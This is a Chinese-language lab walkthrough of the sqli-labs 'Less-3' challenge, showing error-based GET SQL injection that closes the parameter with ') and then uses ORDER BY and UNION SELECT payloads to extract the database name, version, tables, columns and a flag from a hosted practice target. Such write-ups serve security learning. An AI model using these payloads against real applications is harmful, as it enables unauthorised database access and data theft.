Less-3

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

1.判断是否存在注入

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1'

错误回显 =>存在注入

2.判断参数类型

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1 and 1=2

正确回显 => 字符型

3.进行参数闭合

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=2

错误回显 

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=1

错误回显 => 第一位闭合成功

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') and 1=1

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') order by 3

正常回显

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1) order by 4

错误回显 => 有3列

5.进行 union select联合查询，发现显示位

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,3 --+

2,3显出出来 =>2,3位显示位

6.查看所在数据库和数据库版本

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,database(),version() --+

7.查看数据库的表

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

8.查看jCKIHUzE表中的列

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="jCKIHUzE" --+

9.查看表中的flag列中的数据

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(flag) from jCKIHUzE --+